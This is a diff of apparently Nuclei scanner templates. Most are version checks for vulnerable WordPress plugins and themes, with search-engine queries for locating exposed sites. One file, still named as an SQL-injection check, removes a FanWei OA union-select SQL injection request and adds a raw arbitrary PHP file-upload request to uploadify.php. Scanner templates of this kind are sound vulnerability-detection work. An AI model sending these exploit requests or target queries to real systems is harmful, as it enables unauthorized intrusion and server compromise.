+++ b/poc/sql/CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43242-4e52d3d71830189e476038c8a70edb3f
+
+info:
+ name: >
+ Indeed Membership Pro <= 12.6 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The Indeed Membership Pro plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 12.6 via deserialization of untrusted input. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f314c5-ba73-4204-b276-904d9de7c099?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43242
+ metadata:
+ fofa-query: "wp-content/plugins/indeed-membership-pro/"
+ google-query: inurl:"/wp-content/plugins/indeed-membership-pro/"
+ shodan-query: 'vuln:CVE-2024-43242'
+ tags: cve,wordpress,wp-plugin,indeed-membership-pro,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/indeed-membership-pro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "indeed-membership-pro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 12.6')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml b/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
new file mode 100644
index 0000000000..16a787d620
--- /dev/null
+++ b/poc/sql/CVE-2024-43247-0624f0bab17c71db9707db1533c1022b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43247-0624f0bab17c71db9707db1533c1022b
+
+info:
+ name: >
+ WHMpress <= 6.2-revision-5 - Missing Authorization to Authenticated (Subscriber+) Settings Update
+ author: topscoder
+ severity: low
+ description: >
+ The WHMpress - WHMCS WordPress Integration Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.2-revision-5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/7d264e88-7137-48ff-8ce3-5fff77e2474a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43247
+ metadata:
+ fofa-query: "wp-content/plugins/whmpress/"
+ google-query: inurl:"/wp-content/plugins/whmpress/"
+ shodan-query: 'vuln:CVE-2024-43247'
+ tags: cve,wordpress,wp-plugin,whmpress,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/whmpress/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "whmpress"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 6.2-revision-5')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml b/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
new file mode 100644
index 0000000000..74b098c79e
--- /dev/null
+++ b/poc/sql/CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43260-315618bd36c9fc6ec474dbde5606bc4c
+
+info:
+ name: >
+ Clearfy Cache <= 2.2.3 - Missing Authorization
+ author: topscoder
+ severity: low
+ description: >
+ The Clearfy Cache – WordPress optimization plugin, Minify HTML, CSS & JS, Defer plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.2.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ddc29341-a23e-4694-b852-90794c01473a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43260
+ metadata:
+ fofa-query: "wp-content/plugins/clearfy/"
+ google-query: inurl:"/wp-content/plugins/clearfy/"
+ shodan-query: 'vuln:CVE-2024-43260'
+ tags: cve,wordpress,wp-plugin,clearfy,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/clearfy/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "clearfy"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2.3')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml b/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
new file mode 100644
index 0000000000..5e8eea816e
--- /dev/null
+++ b/poc/sql/CVE-2024-43263-239fd68ccb4495d13837323dbe18444e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43263-239fd68ccb4495d13837323dbe18444e
+
+info:
+ name: >
+ Visual Composer Starter <= 3.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Visual Composer Starter theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/72c0fc66-44c7-4657-878a-e5109178e8e3?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43263
+ metadata:
+ fofa-query: "wp-content/themes/visual-composer-starter/"
+ google-query: inurl:"/wp-content/themes/visual-composer-starter/"
+ shodan-query: 'vuln:CVE-2024-43263'
+ tags: cve,wordpress,wp-theme,visual-composer-starter,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/visual-composer-starter/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "visual-composer-starter"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.3')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml b/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
new file mode 100644
index 0000000000..b45504476a
--- /dev/null
+++ b/poc/sql/CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43276-8ffef4fa8d4aa2bb58db228915f672b3
+
+info:
+ name: >
+ Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43276
+ metadata:
+ fofa-query: "wp-content/plugins/orbisius-child-theme-creator/"
+ google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/"
+ shodan-query: 'vuln:CVE-2024-43276'
+ tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "orbisius-child-theme-creator"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml b/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
new file mode 100644
index 0000000000..4be58a26c1
--- /dev/null
+++ b/poc/sql/CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43280-db44f6b8fdcdf21a26dbde4aa2be30c5
+
+info:
+ name: >
+ Salon booking system <= 10.8.1 - Unauthenticated Open Redirect
+ author: topscoder
+ severity: medium
+ description: >
+ The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-43280
+ metadata:
+ fofa-query: "wp-content/plugins/salon-booking-system/"
+ google-query: inurl:"/wp-content/plugins/salon-booking-system/"
+ shodan-query: 'vuln:CVE-2024-43280'
+ tags: cve,wordpress,wp-plugin,salon-booking-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "salon-booking-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 10.8.1')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml b/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
new file mode 100644
index 0000000000..dee8b7e53f
--- /dev/null
+++ b/poc/sql/CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43281-aaebfb81b7bf6e846c28d5dbeba71f10
+
+info:
+ name: >
+ Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion
+ author: topscoder
+ severity: low
+ description: >
+ The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-43281
+ metadata:
+ fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/"
+ shodan-query: 'vuln:CVE-2024-43281'
+ tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "void-elementor-post-grid-addon-for-elementor-page-builder"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml b/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
new file mode 100644
index 0000000000..7774d0c164
--- /dev/null
+++ b/poc/sql/CVE-2024-43288-65d9db817865efa08483ff84c1215bb9.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43288-65d9db817865efa08483ff84c1215bb9
+
+info:
+ name: >
+ wpForo Forum <= 2.3.4 - Authenticated (Subscriber+) Insecure Direct Object Reference
+ author: topscoder
+ severity: low
+ description: >
+ The wpForo Forum plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.3.4 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9cac5c66-d366-4a67-b29b-4efed67ab55b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43288
+ metadata:
+ fofa-query: "wp-content/plugins/wpforo/"
+ google-query: inurl:"/wp-content/plugins/wpforo/"
+ shodan-query: 'vuln:CVE-2024-43288'
+ tags: cve,wordpress,wp-plugin,wpforo,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpforo/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpforo"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.3.4')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml b/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
new file mode 100644
index 0000000000..7b91ea19d5
--- /dev/null
+++ b/poc/sql/CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43319-0ae4b0bccdbd9e62e02a5b73c8f70753
+
+info:
+ name: >
+ Flash & HTML5 Video <= 2.5.31 - Authenticated (Subscriber+) Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+ The HTML5 Video Player – mp4 Video Player Plugin and Block plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.5.31 via the h5vp_export_data() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract potentially sensitive information from exports.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/604862d9-e032-4806-8a14-3e4ad0ae1ee2?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-43319
+ metadata:
+ fofa-query: "wp-content/plugins/html5-video-player/"
+ google-query: inurl:"/wp-content/plugins/html5-video-player/"
+ shodan-query: 'vuln:CVE-2024-43319'
+ tags: cve,wordpress,wp-plugin,html5-video-player,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/html5-video-player/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "html5-video-player"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.31')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml b/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
new file mode 100644
index 0000000000..c90099f47f
--- /dev/null
+++ b/poc/sql/CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43352-1f777e494418c326b6a3b5ba5223adb4
+
+info:
+ name: >
+ GivingPress Lite <= 1.8.6 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The GivingPress Lite theme for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.8.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/69a14e2f-442e-421c-bf5d-0bff3b822911?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-43352
+ metadata:
+ fofa-query: "wp-content/themes/givingpress-lite/"
+ google-query: inurl:"/wp-content/themes/givingpress-lite/"
+ shodan-query: 'vuln:CVE-2024-43352'
+ tags: cve,wordpress,wp-theme,givingpress-lite,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/themes/givingpress-lite/style.css"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Version: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "givingpress-lite"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml b/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
new file mode 100644
index 0000000000..3c3e731a8d
--- /dev/null
+++ b/poc/sql/CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-43354-adbfb0fd375f392abe494aebd005cbcb
+
+info:
+ name: >
+ myCred <= 2.7.2 - Unauthenticated PHP Object Injection
+ author: topscoder
+ severity: critical
+ description: >
+ The myCred – Loyalty Points and Rewards plugin for WordPress and WooCommerce – Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 2.7.2 via deserialization of untrusted input from the 'data' parameter This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44ea3322-10f6-4f52-8fa8-8cc2632b67ce?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-43354
+ metadata:
+ fofa-query: "wp-content/plugins/mycred/"
+ google-query: inurl:"/wp-content/plugins/mycred/"
+ shodan-query: 'vuln:CVE-2024-43354'
+ tags: cve,wordpress,wp-plugin,mycred,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "mycred"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.7.2')
\ No newline at end of file
diff --git a/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml b/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
new file mode 100644
index 0000000000..5c5a9860fc
--- /dev/null
+++ b/poc/sql/CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-7258-ed6ffad18c93f5ae2665db7f4a1ac069
+
+info:
+ name: >
+ WooCommerce Google Feed Manager <= 2.8.0 - Missing Authorization to Authenticated (Contributor+) Arbitrary Feed Actions
+ author: topscoder
+ severity: low
+ description: >
+ The WooCommerce Google Feed Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 2.8.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to perform various feed actions, such as deleting a feed, duplicating a feed, and changing the status of a feed.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6b8fac8f-619a-442e-8b8f-43a0c0a44b07?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-7258
+ metadata:
+ fofa-query: "wp-content/plugins/wp-product-feed-manager/"
+ google-query: inurl:"/wp-content/plugins/wp-product-feed-manager/"
+ shodan-query: 'vuln:CVE-2024-7258'
+ tags: cve,wordpress,wp-plugin,wp-product-feed-manager,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-product-feed-manager/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-product-feed-manager"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.8.0')
\ No newline at end of file
diff --git a/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml b/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml
new file mode 100644
index 0000000000..1af3b7e51d
--- /dev/null
+++ b/poc/sql/compute-links-a7a90df4c2ee2fb79d7db37dc725b006.yaml
@@ -0,0 +1,59 @@
+id: compute-links-a7a90df4c2ee2fb79d7db37dc725b006
+
+info:
+ name: >
+ Compute Links <= 1.2.1 - Unauthenticated Remote File Inclusion
+ author: topscoder
+ severity: critical
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1d2b78e0-1b82-4074-8051-e44dcfe3ac51?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/compute-links/"
+ google-query: inurl:"/wp-content/plugins/compute-links/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,compute-links,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/compute-links/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "compute-links"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.1')
\ No newline at end of file
diff --git a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml
index 4e7ede529c..8c93d2bd55 100644
--- a/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml
+++ b/poc/sql/ecology-oa-HrmCareerApplyPerView-sqli.yaml
@@ -1,29 +1,39 @@
id: FanWei
-
info:
- name: FanWei HrmCareerApplyPerView SQL Injection Vulnerability
+ name: FanWei Micro OA E-Office Uploadify Arbitrary File Upload Vulnerability
author: Zero Trust Security Attack and Defense Laboratory
severity: high
description: |
- FanWei There is a HrmCareerApplyPerView SQL injection vulnerability that hackers can use to obtain sensitive information-
+ The pan micro OA E-Office uploads files in uploadify.php without strict filtering, which allows unrestricted file uploading. Attackers can directly obtain website permissions through this vulnerability
metadata:
- fofa-query: app="泛微-协同办公OA"
- hunter-query: web.title="泛微-协同办公OA"
-
+ fofa-query: app="泛微-EOffice"
+ hunter-query: web.title="泛微软件"
http:
- raw:
- |
- GET /pweb/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%271%27)),db_name(1),5,6,7 HTTP/1.1
+ POST /inc/jquery/uploadify/uploadify.php HTTP/1.1
Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)
- Accept-Encoding: gzip, deflate
+ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Connection: close
+ Content-Length: 259
+ Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
+ Accept-Encoding: gzip
+
+ --e64bdf16c554bbc109cecef6451c26a4
+ Content-Disposition: form-data; name="Filedata"; filename="test.php"
+ Content-Type: image/jpeg
+
+
+
+ --e64bdf16c554bbc109cecef6451c26a4--
req-condition: true
matchers:
- type: dsl
dsl:
- - 'contains(body_1, "c4ca")'
+ - 'status_code_1 == 200 && len(body) > 0'
condition: and
+
+# /attachment/3466744850/xxx.php
diff --git a/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml b/poc/sql/houzez-9a635670fedb497fead8ede7dc06b417.yaml
new file mode 100644
index 0000000000..ef8d5d9932
--- /dev/null
